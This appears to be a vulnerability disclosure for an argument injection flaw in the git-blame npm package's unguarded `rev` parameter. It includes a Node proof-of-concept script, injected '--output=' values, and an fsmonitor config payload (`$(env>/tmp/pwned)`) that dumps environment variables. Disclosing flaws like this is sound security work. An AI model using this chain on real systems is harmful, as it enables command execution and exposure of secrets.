
Argument Injection vulnerability in git-blame@1.4.0

The git-blame npm package is vulnerable to Argument Injection via the `rev` parameter allowing arbitrary command injection.


The git-blame project describes itself as a library that allows shelling out to git blame in a streaming Node fashion. This report was privately disclosed to the maintainer yet remains unpatched as the maintainer did not reply to follow-up messages.

Resources:

Background

I’m reporting an Argument Injection vulnerability in the git-blame npm package.

This vulnerability allows arbitrary command injection due to:

  1. git blame allows for argument injection via the --output=/some/file/here command-line flag
  2. a bare git repository allows for a local config file that instructs git to use its core configuration option fsmonitor and sets it to any arbitrary command, such as $(env>/tmp/pwned)

The maintainer added a guard for the `file` input, but the `rev` parameter is still passed through unvalidated and remains vulnerable.

Exploit Proof of Concept

/* eslint-disable no-console, func-names */
'use strict';
var gitBlame = require('./');
var path = require('path');
var repoPath = path.resolve(process.env.REPO || (__dirname + '/.git'));
// var file = process.env.FILE || 'package.json';
// var rev = process.env.REV || 'HEAD';
// Both values are passed straight to the git command line; `rev` is the
// parameter that is not guarded, so git reads it as the --output flag.
var file = '--output=hello.txt';
var rev = '--output=hello.txt';
gitBlame(repoPath, {
  file: file,
  rev: rev
}).on('data', function (type, data) {
  // type can be 'line' or 'commit'
  console.log(type, data);
}).on('error', function (err) {
  console.error(err.message);
  process.exit(1);
}).on('end', function () {
  console.log('±±±±±±±±±±±±±±±±±±');
  console.log("That's all, folks!");
});

Supporting references

  1. https://www.nodejs-security.com/book/command-injection
  2. https://www.nodejs-security.com/blog/destroyed-by-dashes-how-two-hyphens-cause-argument-injection-vulnerability-in-blamer-npm-package?utm_source=feedly
  3. https://www.nodejs-security.com/blog/introduction-command-injection-vulnerabilities-nodejs-javascript
  4. SonarSource’s research on Argument Injection and their git repository setup.
